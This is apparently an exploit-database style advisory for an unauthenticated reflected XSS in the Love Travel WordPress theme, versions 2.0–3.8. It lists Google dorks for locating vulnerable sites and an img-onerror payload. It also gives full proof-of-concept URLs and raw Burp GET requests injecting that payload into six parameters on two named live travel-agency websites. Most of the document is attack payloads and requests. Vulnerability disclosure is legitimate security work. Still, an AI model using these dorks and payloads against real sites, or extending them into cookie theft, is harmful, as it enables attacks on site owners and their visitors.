[+] :: Exploit Title: Love Travel WordPress theme v3.8 - Unauthenticated Reflected XSS
[+] :: Google Dork #1: inurl:/wp-content/themes/lovetravel/
[+] :: Google Dork #2: inurl:/wp-content/themes/lovetravel-child/
[+] :: Date: 2020-09-09
[+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ]
[+] :: Vendor: Nicdark [ http://www.nicdarkthemes.com ]
[+] :: Software Version: 3.8
[+] :: Software Link: https://themeforest.net/item/love-travel-creative-travel-agency-wordpress/7704831
[+] :: Tested on: Kali Linux
[+] :: CVE:
[+] :: CWE: CWE-79
[i] :: Info:
An Unauthenticated Reflected XSS vulnerability was discovered in the Love Travel theme for WordPress, affected versions: 2.0-3.8.
Vulnerable parameters: keyword, date_from, date_to, price_from_to, nicdark_price_from, nicdark_price_to.
[$] :: Payload:
"><img src=x onerror=alert(`Ex.Mi`);alert(document.domain);>
[!] :: PoC #1:
https://www.mysunsea.net/packages/?advsearch=true&posttype=packages&keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&tax-0=visibilita&visibilita=evidenza-in-homepage&tax-1=categoria&categoria=grecia&tax-2=strutture&strutture=grecia&tax-3=destination-package&destination-package=cefalonia&tax-4=typology-package&typology-package=combo&tax-5=duration-package&duration-package=&tax-6=person-package&person-package=&date_from=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&date_to=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&price_from_to=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&qnt-taxonomies=7&nicdark_price_from=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&nicdark_price_to=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E
[!] :: PoC #1 (Burp Suite):
GET /packages/?advsearch=true&posttype=packages&keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&tax-0=visibilita&visibilita=evidenza-in-homepage&tax-1=categoria&categoria=grecia&tax-2=strutture&strutture=grecia&tax-3=destination-package&destination-package=cefalonia&tax-4=typology-package&typology-package=combo&tax-5=duration-package&duration-package=&tax-6=person-package&person-package=&date_from=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&date_to=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&price_from_to=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&qnt-taxonomies=7&nicdark_price_from=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&nicdark_price_to=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E HTTP/1.1
Host: www.mysunsea.net
[!] :: PoC #2:
http://www.polynesievoyages.pf/blog/packages/?advsearch=true&posttype=&keyword=%22%3E%3Cimg%20src=x%20onerror=alert(`Ex.Mi`);alert(document.domain);%3E&tax-0=&destination-package=&tax-1=typology-package&typology-package=&tax-2=duration-package&duration-package=&tax-3=person-package&person-package=&date_from=&date_to=&price_from_to=&qnt-taxonomies=4
[!] :: PoC #2 (Burp Suite):
GET /blog/packages/?advsearch=true&posttype=&keyword=%22%3E%3Cimg%20src=x%20onerror=alert(`Ex.Mi`);alert(document.domain);%3E&tax-0=&destination-package=&tax-1=typology-package&typology-package=&tax-2=duration-package&duration-package=&tax-3=person-package&person-package=&date_from=&date_to=&price_from_to=&qnt-taxonomies=4 HTTP/1.1
Host: www.polynesievoyages.pf
[@] :: Contacts:
Website: ex-mi.ru
Telegram: @ex_mi
GitHub: @ex-mi
Medium: @ex-mi
